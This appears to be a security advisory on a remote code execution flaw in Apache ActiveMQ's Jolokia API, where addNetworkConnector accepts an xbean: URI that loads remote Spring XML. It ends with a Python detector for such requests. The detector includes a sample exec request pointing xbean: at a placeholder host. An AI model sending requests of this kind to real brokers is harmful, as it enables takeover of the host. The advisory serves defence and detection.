H3-2026-0008
Apache ActiveMQ Jolokia Remote Code Execution Vulnerability
| Category | VULNERABILITY |
| Base Score | 8.8 |
Description
Apache ActiveMQ exposes a Jolokia JMX REST API through its web console. The addNetworkConnector broker operation accepts an arbitrary URI, including the xbean: protocol, which loads Spring XML bean definitions from a remote URL. An attacker can exploit this to achieve remote code execution on the ActiveMQ host by supplying a malicious Spring XML payload that instantiates Java classes to execute arbitrary commands.
Impact
An attacker with access to the ActiveMQ web console can achieve remote code execution as the ActiveMQ service user, leading to full compromise of the underlying host. This is especially dangerous when combined with unauthenticated Jolokia API access (CVE-2024-32114) or known default web console credentials.
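A detection-side check for the call named in the Description, added here as an example and not taken from the advisory or from ActiveMQ: it inspects captured Jolokia POST bodies (for instance from a reverse proxy that records request bodies) and flags `exec` requests for `addNetworkConnector` whose arguments contain `xbean:`. The function names, the broker MBean name and the sample bodies are assumptions constructed for illustration.

```python
import json

WATCHED_OPERATION = "addNetworkConnector"  # operation named in the advisory
FLAGGED_SCHEME = "xbean:"                  # URI scheme named in the advisory

def _strings(value):
    """Yield every string nested anywhere inside a decoded JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        yield from _strings(list(value.values()))
    elif isinstance(value, list):
        for item in value:
            yield from _strings(item)

def findings(body):
    """Return (mbean, argument) pairs for flagged calls in one POST body."""
    try:
        decoded = json.loads(body)
    except (TypeError, ValueError):
        return []  # not JSON, so not a Jolokia POST request
    # Jolokia accepts one request object or a JSON array (bulk request).
    requests = decoded if isinstance(decoded, list) else [decoded]
    hits = []
    for req in requests:
        if not isinstance(req, dict) or str(req.get("type", "")).lower() != "exec":
            continue
        # The operation may carry a signature: "name(java.lang.String)".
        operation = str(req.get("operation", "")).split("(", 1)[0].strip()
        if operation != WATCHED_OPERATION:
            continue
        for arg in _strings(req.get("arguments", [])):
            # Substring match also catches the scheme nested in another URI.
            if FLAGGED_SCHEME in arg.lower():
                hits.append((str(req.get("mbean", "")), arg))
    return hits

# Constructed sample bodies; BROKER and the host names are assumed placeholders.
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLES = [
    json.dumps({"type": "read", "mbean": BROKER, "attribute": "TotalMessageCount"}),
    json.dumps({"type": "exec", "mbean": BROKER, "operation": WATCHED_OPERATION,
                "arguments": ["static:(tcp://broker-b.example.internal:61616)"]}),
    json.dumps([{"type": "exec", "mbean": BROKER,
                 "operation": WATCHED_OPERATION + "(java.lang.String)",
                 "arguments": ["XBEAN:http://placeholder.invalid/beans.xml"]}]),
]
```

Only the third sample is flagged. A hit from any source is worth triage, since routine broker administration has little reason to add a network connector with this scheme.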